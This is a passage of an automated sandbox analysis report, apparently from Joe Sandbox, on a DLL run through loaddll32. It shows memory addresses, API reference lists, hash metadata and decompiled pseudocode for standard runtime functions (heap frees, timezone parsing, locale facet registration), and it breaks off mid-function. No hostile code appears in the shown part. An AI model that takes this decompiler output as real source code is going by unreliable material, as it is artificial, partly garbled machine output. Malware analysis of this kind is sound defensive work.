0x6e25c044
0x6e25c044
0x6e25c04a
0x6e25c04d
0x6e25c04d
0x6e25c050
0x6e25c057
0x6e25c059
0x6e25c05d
0x6e25c065
0x6e25c06c
0x6e25c072
0x6e25c073
0x6e25c073
0x6e25c07a
0x6e25c07c
0x6e25c081
0x6e25c089
0x6e25c08e
0x6e25c08f
0x6e25c08f
0x6e25c092
0x6e25c095
0x6e25c098
0x6e25c09b
0x6e25c09b
0x6e25c0ad

APIs

___free_lconv_mon.LIBCMT ref: 6E25BFA8

Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7EC
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7FE
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C810
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C822
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C834
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C846
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C858
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C86A
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C87C
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C88E
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8A0
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8B2
Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8C4

_free.LIBCMT ref: 6E25BF9D

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E25BFBF
_free.LIBCMT ref: 6E25BFD4
_free.LIBCMT ref: 6E25BFDF
_free.LIBCMT ref: 6E25C001
_free.LIBCMT ref: 6E25C014
_free.LIBCMT ref: 6E25C022
_free.LIBCMT ref: 6E25C02D
_free.LIBCMT ref: 6E25C065
_free.LIBCMT ref: 6E25C06C
_free.LIBCMT ref: 6E25C089
_free.LIBCMT ref: 6E25C0A1

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
Instruction ID: 8e10108ec5c9639180e93905bc15030a070d53f974845a8b297362a1babc60cf
Opcode Fuzzy Hash: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
Instruction Fuzzy Hash: 63319E3560430EDFFB648BB8D942B9673FBAF00B15F204829E069CB251EF75A9648B10

Uniqueness

Uniqueness Score: -1.00%

Function 6E25877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E6E25877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E25822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E258289( &_v8) != 0 || E6E258231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E25822B();
					_t32 =  &_v52; // 0x6e272130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E258289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E242188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e2c506c; // 0xafbb8a96
						_v100 = _t74 ^ _t192;
						 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
						 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e2c7a10 = 0;
						_t78 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e272130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E24F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e272130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E24CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E24CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E25877C(0x6e272130, _t172, __eflags);
							}
						}
						E6E24CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E21F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E258231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E25825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E24CBD3( *0x6e2c7a08);
								 *0x6e2c7a08 = 0;
								 *_t194 = 0x6e2c7a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e2c7a18 * 0x3c;
									_t168 =  *0x6e2c7a6c; // 0x0
									_push(_t171);
									 *0x6e2c7a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e2c7a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e2c7ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e2c7ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E243CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e2c7a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e2c7a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E258225()) = _v12;
								 *((intOrPtr*)(E6E258219())) = _v16;
								_t96 = E6E25821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e2c7a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E24CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e258b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e258b6e
						 *0x6e2c7a08 = E6E24F26D(_t154 - _t170, _t13);
						_t116 = E6E24CBD3(0);
						_t167 =  *0x6e2c7a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e258b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e258b6e
							_t119 = E6E24AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6E263B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E24BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E24BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E24BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E258225()) = _v8;
										_t128 = E6E258219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E263B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

0x6e25877c
0x6e258786
0x6e25878b
0x6e25878f
0x6e258791
0x6e258799
0x6e2587a4
0x6e258944
0x6e258946
0x6e258947
0x6e258948
0x6e258949
0x6e25894a
0x6e25894b
0x6e258950
0x6e258954
0x6e258956
0x6e258959
0x6e258960
0x6e258964
0x6e258967
0x6e25896b
0x6e25896e
0x6e258971
0x6e258976
0x6e258977
0x6e258979
0x6e258aa1
0x6e258aa1
0x6e258aa2
0x6e258aa3
0x6e258aa4
0x6e258aa5
0x6e258aa6
0x6e258aab
0x6e258aae
0x6e258aaf
0x6e258ab7
0x6e258abe
0x6e258ac1
0x6e258ace
0x6e258ad5
0x6e258ad6
0x6e258ad7
0x6e258add
0x6e258aec
0x6e258af3
0x6e258afb
0x6e258afd
0x6e258b07
0x6e258b0a
0x6e258b17
0x6e258b1a
0x6e258b1c
0x6e258b35
0x6e258b3d
0x6e258b3f
0x6e258b45
0x6e258b4a
0x6e258b41
0x6e258b41
0x00000000
0x6e258b41
0x6e258b1e
0x6e258b1e
0x6e258b1f
0x6e258b1f
0x6e258b1f
0x6e258b4c
0x6e258aff
0x6e258aff
0x6e258aff
0x6e258b59
0x6e258b5b
0x6e258b5d
0x6e258b5f
0x6e258b6f
0x6e258b6f
0x6e258b61
0x6e258b61
0x6e258b64
0x00000000
0x6e258b66
0x6e258b66
0x6e258b67
0x6e258b6c
0x6e258b64
0x6e258b75
0x6e258b80
0x6e258b8b
0x6e25897f
0x6e258983
0x6e258988
0x6e258989
0x6e25898b
0x00000000
0x6e258991
0x6e258995
0x6e25899a
0x6e25899b
0x6e25899d
0x00000000
0x6e2589a3
0x6e2589a9
0x6e2589ae
0x6e2589b4
0x6e2589bb
0x6e2589c1
0x6e2589c4
0x6e2589ca
0x6e2589d1
0x6e2589d7
0x6e2589db
0x6e2589e1
0x6e2589e4
0x6e2589eb
0x6e2589f0
0x6e2589f0
0x6e2589f2
0x6e2589f2
0x6e2589f5
0x6e2589fc
0x6e258a14
0x6e258a14
0x6e258a17
0x6e2589fe
0x6e2589fe
0x6e258a03
0x6e258a05
0x00000000
0x6e258a07
0x6e258a09
0x6e258a0f
0x6e258a0f
0x6e258a05
0x6e258a1f
0x6e258a33
0x6e258a39
0x6e258a3b
0x6e258a49
0x6e258a4b
0x6e258a3d
0x6e258a3d
0x6e258a40
0x00000000
0x6e258a42
0x6e258a44
0x6e258a44
0x6e258a40
0x6e258a60
0x6e258a67
0x6e258a69
0x6e258a78
0x6e258a7b
0x6e258a6b
0x6e258a6b
0x6e258a6e
0x00000000
0x6e258a70
0x6e258a73
0x6e258a73
0x6e258a6e
0x6e258a69
0x6e258a85
0x6e258a8f
0x6e258a94
0x6e258a99
0x6e258aa0
0x6e258aa0
0x6e25899d
0x6e25898b
0x6e2587bc
0x6e2587bc
0x6e2587c2
0x6e2587c7
0x6e2587fd
0x6e2587fe
0x6e258804
0x6e258806
0x6e258806
0x6e258809
0x6e258809
0x6e25880b
0x6e25880c
0x6e258812
0x6e25881d
0x6e258822
0x6e258827
0x6e258831
0x00000000
0x6e258837
0x6e258837
0x6e258839
0x6e25883a
0x6e25883a
0x6e25883d
0x6e25883d
0x6e25883f
0x6e258840
0x6e258847
0x6e25884c
0x6e258851
0x6e258856
0x6e25885e
0x6e25885f
0x6e258865
0x6e25886a
0x6e25886f
0x6e258875
0x6e25887a
0x6e25887b
0x6e25887e
0x00000000
0x00000000
0x00000000
0x6e25887e
0x6e258883
0x6e258884
0x6e258889
0x6e25888b
0x6e25888b
0x6e258893
0x6e258899
0x6e25889c
0x6e25889c
0x6e2588a0
0x00000000
0x00000000
0x6e2588aa
0x6e2588aa
0x6e2588ad
0x6e2588b0
0x6e2588b2
0x6e2588c0
0x6e2588c2
0x6e2588cc
0x6e2588cc
0x6e2588ce
0x6e2588d0
0x00000000
0x00000000
0x6e2588c7
0x6e2588c9
0x6e2588cb
0x6e2588cb
0x00000000
0x6e2588cb
0x00000000
0x6e2588c9
0x6e2588d2
0x6e2588d5
0x6e2588d7
0x6e2588e2
0x6e2588e4
0x6e2588ee
0x6e2588ee
0x6e2588f0
0x6e2588f2
0x00000000
0x00000000
0x6e2588e9
0x6e2588eb
0x6e2588ed
0x6e2588ed
0x00000000
0x6e2588ed
0x00000000
0x6e2588eb
0x6e2588ee
0x6e2588d5
0x6e2588f4
0x6e2588f4
0x6e2588f6
0x6e2588fa
0x6e2588fa
0x6e2588ff
0x6e258901
0x6e258904
0x6e258907
0x6e258909
0x6e25890c
0x6e258924
0x6e258927
0x6e25892a
0x6e258932
0x6e258937
0x6e25893c
0x00000000
0x6e25893c
0x6e25890e
0x6e258913
0x6e258916
0x6e25891b
0x6e25891e
0x6e258920
0x00000000
0x00000000
0x6e258922
0x6e25886f
0x00000000
0x6e258856
0x6e2587c9
0x6e2587c9
0x6e2587cb
0x6e2587cd
0x6e2587cd
0x6e2587d1
0x00000000
0x00000000
0x6e2587d5
0x6e2587e9
0x6e2587e9
0x6e2587d7
0x6e2587d7
0x6e2587d7
0x6e2587dd
0x00000000
0x6e2587df
0x6e2587df
0x6e2587e2
0x6e2587e7
0x00000000
0x00000000
0x00000000
0x00000000
0x6e2587e7
0x6e2587dd
0x6e2587f2
0x6e2587f4
0x6e258943
0x6e258943
0x6e2587fa
0x6e2587fa
0x00000000
0x6e2587fa
0x00000000
0x6e2587f4
0x6e2587ed
0x6e2587ef
0x6e2587ef
0x00000000
0x6e2587ef
0x6e2587c7
0x00000000

APIs

_free.LIBCMT ref: 6E2587FE
_free.LIBCMT ref: 6E258822
_free.LIBCMT ref: 6E2589A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
_free.LIBCMT ref: 6E258B75

Strings

0!'n, xrefs: 6E258964, 6E25896A
0!'n, xrefs: 6E258AD8

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!'n$0!'n
API String ID: 314583886-1210743812
Opcode ID: 7fc5579a2801c1c1bfd3e136e3535b9da8e1a0f9ce0aa0082717f3c60b4d8c5f
Instruction ID: 8658e827d0e1df55776df3c13426c912fb94c955fdc5083b5a76bfd8b80036cb
Opcode Fuzzy Hash: 7fc5579a2801c1c1bfd3e136e3535b9da8e1a0f9ce0aa0082717f3c60b4d8c5f
Instruction Fuzzy Hash: 87C1357592424EEBDB488FF9CE54AAA7BBBEF42314F1409BAD451D7380E7B08A11C750

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E24D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e270c10) {
					E6E24CBD3(_t52);
					_t26 = _a4;
				}
				E6E24CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E24D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E24D28E(4,  &_v8);
			}

0x6e24d3f5
0x6e24d3f8
0x6e24d400
0x6e24d403
0x6e24d408
0x6e24d40b
0x6e24d40f
0x6e24d41a
0x6e24d425
0x6e24d430
0x6e24d43b
0x6e24d446
0x6e24d451
0x6e24d45c
0x6e24d46a
0x6e24d472
0x6e24d47b
0x6e24d483
0x6e24d497

APIs

_free.LIBCMT ref: 6E24D403

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E24D40F
_free.LIBCMT ref: 6E24D41A
_free.LIBCMT ref: 6E24D425
_free.LIBCMT ref: 6E24D430
_free.LIBCMT ref: 6E24D43B
_free.LIBCMT ref: 6E24D446
_free.LIBCMT ref: 6E24D451
_free.LIBCMT ref: 6E24D45C
_free.LIBCMT ref: 6E24D46A

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
Instruction ID: 9f7c4102c4263e28cf1bc5931b56c6b5732a8b74c25de712ae395a4058aaa141
Opcode Fuzzy Hash: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
Instruction Fuzzy Hash: E711FB7954420CFFDB05DF98C841DDE3BBAEF04654B2144A0F9098F122DB7ADE549B80

Uniqueness

Uniqueness Score: -1.00%

Function 6E20777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t50 =  *0x6e2c6c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1E161C(0x6e2c6b2c);
				_t38 = _a8;
				_t20 = E6E1E171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E207E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1E1438(_t42);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E206FD3(__eflags, _t48);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e2c6c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}

0x6e207786
0x6e207790
0x6e207795
0x6e2077a0
0x6e2077a4
0x6e2077a7
0x6e2077ac
0x6e2077b0
0x6e2077b5
0x6e2077b9
0x6e2077fe
0x6e207801
0x6e20780d
0x6e2077bb
0x6e2077bd
0x6e2077c3
0x6e2077c9
0x6e2077d1
0x6e2077d4
0x6e20780e
0x6e207811
0x6e20781f
0x6e207824
0x6e20782b
0x6e207830
0x6e2077d6
0x6e2077d6
0x6e2077d9
0x6e2077dd
0x6e2077e1
0x6e2077ee
0x6e2077f6
0x6e2077f8
0x00000000
0x6e2077f8
0x6e2077bf
0x6e2077bf
0x00000000
0x6e2077bf
0x6e2077bd

APIs

__EH_prolog3.LIBCMT ref: 6E207786
std::_Lockit::_Lockit.LIBCPMT ref: 6E207790
int.LIBCPMT ref: 6E2077A7

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

codecvt.LIBCPMT ref: 6E2077CA
std::_Facet_Register.LIBCPMT ref: 6E2077E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6E207801
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20781F

Strings

,k,n, xrefs: 6E20779B

Memory Dump Source

Source File: 00000000.00000002.472801964.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000000.00000002.472799364.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472845462.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.472875173.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472880657.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.472884173.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ,k,n
API String ID: 2594415655-471452842
Opcode ID: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
Instruction ID: 0179d36af2547f3a6f86643ce04adbca5e5398214e6b67d57264304a796339a0
Opcode Fuzzy Hash: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
Instruction Fuzzy Hash: B311E975A0061D9BCB01EBE4C844AEDB7BBBF44B14F100918E410AB3E0DFB4AA44C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
